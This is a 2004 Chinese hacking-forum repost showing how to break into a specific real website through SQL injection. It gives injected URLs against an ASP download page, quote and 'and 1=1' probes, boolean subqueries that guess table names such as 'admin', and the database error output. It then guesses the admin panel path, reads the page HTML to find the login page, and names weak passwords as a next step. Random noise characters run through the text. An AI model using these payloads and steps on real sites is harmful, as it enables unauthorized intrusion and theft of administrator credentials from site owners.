- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0
我的地盘我做主
该用户从未签到
 |
作者:枫三少 转自:黑基bbs原创作品版1 y& }* k/ p( Z% I* K* N2 j5 p. e8 F
9 c" O- a+ d+ {! V
有很多人问过我这个问题。老是听说,看到文章里谁谁谁怎么分析别人的代码怎么来入侵的。那么怎么找代码呢?
: t5 t( {+ h0 n6 |; D
! ^+ E2 k# G6 I$ L# q9 I1 H分析代码,首先你得有源代码。如果找源代码呢?呵呵,假如是分析DV的,就下一个DV的来,看看他的代码。+ r* N9 v/ m7 @3 }! [. u" K
! ^7 K4 Z& d. @3 W+ }/ ]
在实战中往往因为时间的愿意我们采用的还有从HTML代码入手。8 f; m$ q& {9 c+ M4 L
7 A& p" y# ^- d& S( l这里我简单的介绍一个过程吧。
1 S5 g" g( m) |0 ^
; p: t5 S& a/ U; e首先我找到一个网站,是我们基地首页有连接的
9 y. l4 K6 k3 U/ O* ?" `http://www.16china.com/hack/
+ g# n, l1 G6 E- y2 d
( t" ]( }, ]3 _4 X随便选择一个分页:* T1 U" r; a7 r7 y
http://www.16china.com/hack/SoftView.Asp?SoftID=139
6 e0 S" X+ t+ z, ]& G0 r典型的ASP。看看能不能注射. v; Q; `* M; {6 g9 y
http://www.16china.com/hack/SoftView.Asp?SoftID=139'
" N5 A. d7 H' Z3 ^返回:
* l+ i: j% O9 [9 h/ A! sMicrosoft VBScript 编译器错误 错误 '800a03f6' C* j# v$ x! J2 j! C4 t
b+ }+ ~ y0 f0 _0 h
缺少 'End'
8 z& }' w- Q. x. M m+ b) ^* V3 E. K9 i8 V: v; T( a2 r
/iisHelp/common/500-100.asp,行242
) V0 l6 ~/ x) B
+ e3 ?9 ]% D8 [7 s$ mMicrosoft JET Database Engine 错误 '80040e14' " a, l: M5 y: P
" y! n! B7 k7 ~! A$ D
字符串的语法错误 在查询表达式 'SoftInfo.CateID=Category.CateID and SoftInfo.SubID=SubCate.SubID and SoftInfo.SoftID=139'' 中。 - G3 u. |9 ]0 N$ F" u
, }' ^) C2 Y L8 U& ^" q* H( K6 }/hack/SoftView.Asp,行17
* j! _0 p$ D2 |- O, x再来:
4 P: w; X! g5 ~6 xhttp://www.16china.com/hack/SoftView.Asp?SoftID=139%20and%201=1
5 v3 } z& R3 I N3 S- g! ^返回正常网页。' k' O8 j# Q8 B
& g# ~# ]/ B$ x2 v- l
提交:- Y) }, _4 w( q0 K& B
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20admin)>=01 `" r# X1 V( g5 @/ t
, X/ X9 w& j7 V/ H返回正常页/
n! Z4 B5 ?2 m. Xhttp://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20article)>=0
8 k+ |6 s g8 J# s" r: q* z
7 B$ T, U. w) M3 W; R同样正常。
" G7 P' T1 V( _1 y3 m0 t0 p5 y7 }" M! d
http://www.16china.com/hack/Soft ... )%20from%20article)>=03 r0 c" z/ p9 ]5 r5 R
+ {6 v& P0 C' }……# ?7 ?2 z! V1 G8 y/ c
' G+ c9 V. V A, Z6 v/ {
象上面这样我们就可以成功注射网站。那么在拿到管理员帐号密码后如何找后台0 d. q) Q; z D' ?- F( J
按以往的经验我采用:5 k4 }6 p3 F9 s: v+ r5 B0 E
http://www.16china.com/hack/admin /*这里的”ADMIN“可以用LOGIN等替换*/! W+ J* d) g$ W) ?: M" S& S
我为什么不用http://www.16china.com/hack/admin.asp
* A! j) @5 I7 w& H" ahttp://www.16china.com/hack/admin/index.asp呢?因为我不知道他文件夹里的东西有没有被修改。如果存在ADMIN文件夹,但是并不是常用首页的话IE将返回如“你没有权限浏览网页……”等信息,一般来说我们可以确定后台就在那里。
3 x% a+ l$ Y, Y* Yhttp://www.16china.com/hack/admin返回信息:
+ a( u3 j! o5 ?6 Q0 T8 o错误提示信息!
# @# [* Z& c2 O) @* j0 r4 z 产生错误的可能原因:
$ V7 u' L2 C5 n2 j+ V. v: b7 Q3 Z# T+ }- d: j$ [2 O8 |5 S
3 c; X A- f) I您没有进入本页面的权限!本次操作已被记录!
8 ?; W" o& V( I6 a6 Q可能您还没有登陆或者不具有使用当前功能的权限!请联系管理员.3 ^4 r7 D" m5 m: s h; G
本页面为[管理员]专用,请先登陆后进入.9 _2 Q; p1 j/ x' i) H4 R+ _
- b! ~! i# P, W) v3 `
返回上一页... /*说明登陆URL为常用的如:index.asp...*/* F, v6 `) j0 w' q' T9 @" G' R1 i+ o
查看HTML代码:
/ C K Y1 P. J. k<html><head><title>错误提示信息!</title>
R. b F) o' `, K V. Q! e4 _2 t1 x, Q/ ^7 `6 C' k
……
$ [+ o: i: B6 b: ]: c5 i
; v3 S! D! q8 i& w4 N$ U i<a href=adminlogin.asp class=meun target=_top>登陆</a>后进入.- x- T- j' r+ W7 t" b
…… s# J7 {1 a7 d% o) s& J" @7 c
7 i& `( D8 O1 _" l3 r' z
找到了:
8 F; F# v" Q2 s3 S/ ]% w/ j9 E4 Phttp://www.16china.com/hack/admin/adminlogin.asp
8 _4 v4 S4 L, ~% U: H3 N Z
" D+ ]) N( x9 t2 C; g
2 w- i0 ~' R$ W/ H8 v; B看看他的源代码告诉我们些什么:0 R. ]. T' F2 L! ?6 W2 I
$ L8 C% J3 [6 y4 L
<html>
# H0 g5 ^% s( ?
( ^* Q$ D# k; C- L8 l. Y<head>3 K# c5 Z Z; q9 ?1 v
<title>管理员登陆</title>
" n9 ^) P: U+ A/ m Q
) Z* L$ w4 J- E: m, v% h…………… }5 E9 F) \: q% i3 ]7 D" q
9 g' D3 W8 b8 t关于数据库表名这些这里不多讲,看看,如果我们输入正确的帐号密码将回进入
! c' j8 b x. B4 I- w: H/ yhttp://www.16china.com/hack/admin/adminlogin.asp?action=login
9 B7 Y# |+ I+ D& x4 X这里。
0 M1 U1 G4 u" u+ M( u0 L4 t
% V4 v8 i$ w3 V# q' o* P/ G# X0 ]只要知道了后台,我们就有很多办法,如弱口令,SQL本地执行(赢政下载系统)……
+ B; a" x M3 |" t7 z* X
, T2 i, {$ D- A4 D懂了吗?好了,时间关系加上本人技术原因就写到这里吧。不懂的可以跟贴,大家一起讨论一下:) |
zan
|
IP卡
狗仔卡
发表于 2004-10-4 00:36
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
